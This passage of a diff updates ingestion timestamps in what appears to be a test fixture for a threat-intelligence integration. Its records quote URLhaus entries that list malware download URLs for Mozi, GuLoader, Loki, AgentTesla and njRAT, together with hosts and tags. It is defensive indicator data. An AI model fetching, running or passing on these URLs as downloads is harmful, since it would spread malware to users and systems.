"{\"id\":\"960956\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960956/\",\"url\":\"http://89.160.20.156:60804/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28854,7 +28854,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028943100Z", + "ingested": "2021-12-14T14:56:15.726644729Z", "original": "{\"id\":\"960953\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960953/\",\"url\":\"http://89.160.20.156:51949/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28903,7 +28903,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028949600Z", + "ingested": "2021-12-14T14:56:15.726645097Z", "original": "{\"id\":\"960954\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960954/\",\"url\":\"http://89.160.20.156:48224/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28952,7 +28952,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028956300Z", + "ingested": "2021-12-14T14:56:15.726645464Z", "original": "{\"id\":\"960952\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960952/\",\"url\":\"http://89.160.20.156:37716/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29001,7 +29001,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028962900Z", + "ingested": "2021-12-14T14:56:15.726645939Z", "original": "{\"id\":\"960951\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960951/\",\"url\":\"http://89.160.20.156:60524/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29049,7 +29049,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028969600Z", + "ingested": "2021-12-14T14:56:15.726646293Z", "original": "{\"id\":\"960946\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960946/\",\"url\":\"http://urlfrance.fr/code/dd.txt\",\"url_status\":\"offline\",\"host\":\"urlfrance.fr\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"Encoded\",\"njRAT\",\"rat\"]}", "category": "threat", "type": "indicator", @@ -29099,7 +29099,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028976200Z", + "ingested": "2021-12-14T14:56:15.726646666Z", "original": "{\"id\":\"960947\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960947/\",\"url\":\"http://89.160.20.156:49988/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -29148,7 +29148,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028982900Z", + "ingested": "2021-12-14T14:56:15.726647057Z", "original": "{\"id\":\"960948\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960948/\",\"url\":\"http://89.160.20.156:42857/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29198,7 +29198,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028989600Z", + "ingested": "2021-12-14T14:56:15.726647498Z", "original": "{\"id\":\"960949\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960949/\",\"url\":\"http://89.160.20.156:44751/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -29247,7 +29247,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028996300Z", + "ingested": "2021-12-14T14:56:15.726648518Z", "original": "{\"id\":\"960950\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960950/\",\"url\":\"http://89.160.20.156:47719/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29296,7 +29296,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029003100Z", + "ingested": "2021-12-14T14:56:15.726649033Z", "original": "{\"id\":\"960945\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960945/\",\"url\":\"http://89.160.20.156:38133/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:59:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"07ac0n\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29343,7 +29343,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029009700Z", + "ingested": "2021-12-14T14:56:15.726649401Z", "original": "{\"id\":\"960944\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960944/\",\"url\":\"http://www.sowetoson.com/new/Host_yjwloaz52.bin\",\"url_status\":\"online\",\"host\":\"www.sowetoson.com\",\"date_added\":\"2021-01-14 15:57:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", @@ -29390,7 +29390,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029066700Z", + "ingested": "2021-12-14T14:56:15.726649776Z", "original": "{\"id\":\"960942\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960942/\",\"url\":\"https://www.agamagroup.com.ng/zxc/janomo_uGdNtpvRY170.bin\",\"url_status\":\"online\",\"host\":\"www.agamagroup.com.ng\",\"date_added\":\"2021-01-14 15:57:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", @@ -29437,7 +29437,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029092100Z", + "ingested": "2021-12-14T14:56:15.726650144Z", "original": "{\"id\":\"960943\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960943/\",\"url\":\"https://onedrive.live.com/download?cid=8FE9EB3F9398B325\u0026resid=8FE9EB3F9398B325%21126\u0026authkey=AOzL9FiDhEYRkm8\",\"url_status\":\"online\",\"host\":\"onedrive.live.com\",\"date_added\":\"2021-01-14 15:57:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", @@ -29486,7 +29486,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029099300Z", + "ingested": "2021-12-14T14:56:15.726650509Z", "original": "{\"id\":\"960941\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960941/\",\"url\":\"http://89.160.20.156:46462/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29535,7 +29535,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029106Z", + "ingested": "2021-12-14T14:56:15.726650881Z", "original": "{\"id\":\"960940\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960940/\",\"url\":\"http://89.160.20.156:39046/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29584,7 +29584,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029112700Z", + "ingested": "2021-12-14T14:56:15.726651250Z", "original": "{\"id\":\"960934\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960934/\",\"url\":\"http://89.160.20.156:47418/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29633,7 +29633,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029119200Z", + "ingested": "2021-12-14T14:56:15.726651645Z", "original": "{\"id\":\"960935\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960935/\",\"url\":\"http://89.160.20.156:42287/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29682,7 +29682,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029125800Z", + "ingested": "2021-12-14T14:56:15.726652015Z", "original": "{\"id\":\"960936\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960936/\",\"url\":\"http://89.160.20.156:49596/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29731,7 +29731,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029132500Z", + "ingested": "2021-12-14T14:56:15.726652382Z", "original": "{\"id\":\"960937\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960937/\",\"url\":\"http://89.160.20.156:39815/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29780,7 +29780,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029141100Z", + "ingested": "2021-12-14T14:56:15.726652742Z", "original": "{\"id\":\"960938\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960938/\",\"url\":\"http://89.160.20.156:36568/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29829,7 +29829,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029147800Z", + "ingested": "2021-12-14T14:56:15.726653216Z", "original": "{\"id\":\"960939\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960939/\",\"url\":\"http://89.160.20.156:32954/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29878,7 +29878,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029154400Z", + "ingested": "2021-12-14T14:56:15.726653740Z", "original": "{\"id\":\"960933\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960933/\",\"url\":\"http://89.160.20.156:57752/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29927,7 +29927,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029161Z", + "ingested": "2021-12-14T14:56:15.726654102Z", "original": "{\"id\":\"960932\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960932/\",\"url\":\"http://89.160.20.156:52221/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29976,7 +29976,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029167900Z", + "ingested": "2021-12-14T14:56:15.726654472Z", "original": "{\"id\":\"960931\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960931/\",\"url\":\"http://89.160.20.156:58493/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:40 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30025,7 +30025,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029174500Z", + "ingested": "2021-12-14T14:56:15.726654831Z", "original": "{\"id\":\"960930\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960930/\",\"url\":\"http://89.160.20.156:57603/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30074,7 +30074,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029181100Z", + "ingested": "2021-12-14T14:56:15.726655207Z", "original": "{\"id\":\"960929\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960929/\",\"url\":\"http://89.160.20.156:45439/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30123,7 +30123,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029187700Z", + "ingested": "2021-12-14T14:56:15.726655612Z", "original": "{\"id\":\"960928\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960928/\",\"url\":\"http://89.160.20.156:58291/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30172,7 +30172,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029194400Z", + "ingested": "2021-12-14T14:56:15.726655968Z", "original": "{\"id\":\"960927\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960927/\",\"url\":\"http://89.160.20.156:52785/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30221,7 +30221,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029201100Z", + "ingested": "2021-12-14T14:56:15.726656330Z", "original": "{\"id\":\"960924\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960924/\",\"url\":\"http://89.160.20.156:38582/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30270,7 +30270,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029207700Z", + "ingested": "2021-12-14T14:56:15.726656762Z", "original": "{\"id\":\"960925\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960925/\",\"url\":\"http://89.160.20.156:39503/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30319,7 +30319,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029214300Z", + "ingested": "2021-12-14T14:56:15.726657237Z", "original": "{\"id\":\"960926\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960926/\",\"url\":\"http://89.160.20.156:53018/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30368,7 +30368,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029220900Z", + "ingested": "2021-12-14T14:56:15.726657608Z", "original": "{\"id\":\"960923\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960923/\",\"url\":\"http://89.160.20.156:40698/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30417,7 +30417,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029227400Z", + "ingested": "2021-12-14T14:56:15.726657981Z", "original": "{\"id\":\"960922\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960922/\",\"url\":\"http://89.160.20.156:50060/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30466,7 +30466,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029234100Z", + "ingested": "2021-12-14T14:56:15.726658351Z", "original": "{\"id\":\"960921\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960921/\",\"url\":\"http://89.160.20.156:47874/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30514,7 +30514,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029240700Z", + "ingested": "2021-12-14T14:56:15.726658726Z", "original": "{\"id\":\"960919\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960919/\",\"url\":\"http://perezluzwsdycafeyzmn.dns.navy/perdoc/regasm.exe\",\"url_status\":\"online\",\"host\":\"perezluzwsdycafeyzmn.dns.navy\",\"date_added\":\"2021-01-14 15:46:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"exe\",\"Loki\",\"opendir\"]}", "category": "threat", "type": "indicator", @@ -30564,7 +30564,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029247200Z", + "ingested": "2021-12-14T14:56:15.726659087Z", "original": "{\"id\":\"960920\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960920/\",\"url\":\"http://89.160.20.156:33799/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:46:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -30611,7 +30611,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029253900Z", + "ingested": "2021-12-14T14:56:15.726659463Z", "original": "{\"id\":\"960918\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960918/\",\"url\":\"http://kalamikwsdyonlinedws.dns.navy/kaladoc/vbc.exe\",\"url_status\":\"online\",\"host\":\"kalamikwsdyonlinedws.dns.navy\",\"date_added\":\"2021-01-14 15:45:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"AgentTesla\",\"exe\"]}", "category": "threat", "type": "indicator", @@ -30659,7 +30659,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029260500Z", + "ingested": "2021-12-14T14:56:15.726659835Z", "original": "{\"id\":\"960917\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960917/\",\"url\":\"http://89.160.20.156/js/js/lokkk.jpg\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:45:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"exe\",\"Loki\"]}", "category": "threat", "type": "indicator", @@ -30708,7 +30708,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029267200Z", + "ingested": "2021-12-14T14:56:15.726660202Z", "original": "{\"id\":\"960916\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960916/\",\"url\":\"http://89.160.20.156:33201/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30757,7 +30757,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029273800Z", + "ingested": "2021-12-14T14:56:15.726660579Z", "original": "{\"id\":\"960914\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960914/\",\"url\":\"http://89.160.20.156:53926/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30806,7 +30806,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029280400Z", + "ingested": "2021-12-14T14:56:15.726660948Z", "original": "{\"id\":\"960915\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960915/\",\"url\":\"http://89.160.20.156:43917/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30855,7 +30855,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029287Z", + "ingested": "2021-12-14T14:56:15.726661319Z", "original": "{\"id\":\"960911\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960911/\",\"url\":\"http://89.160.20.156:42053/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30904,7 +30904,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029293600Z", + "ingested": "2021-12-14T14:56:15.726661689Z", "original": "{\"id\":\"960912\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960912/\",\"url\":\"http://89.160.20.156:57875/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not 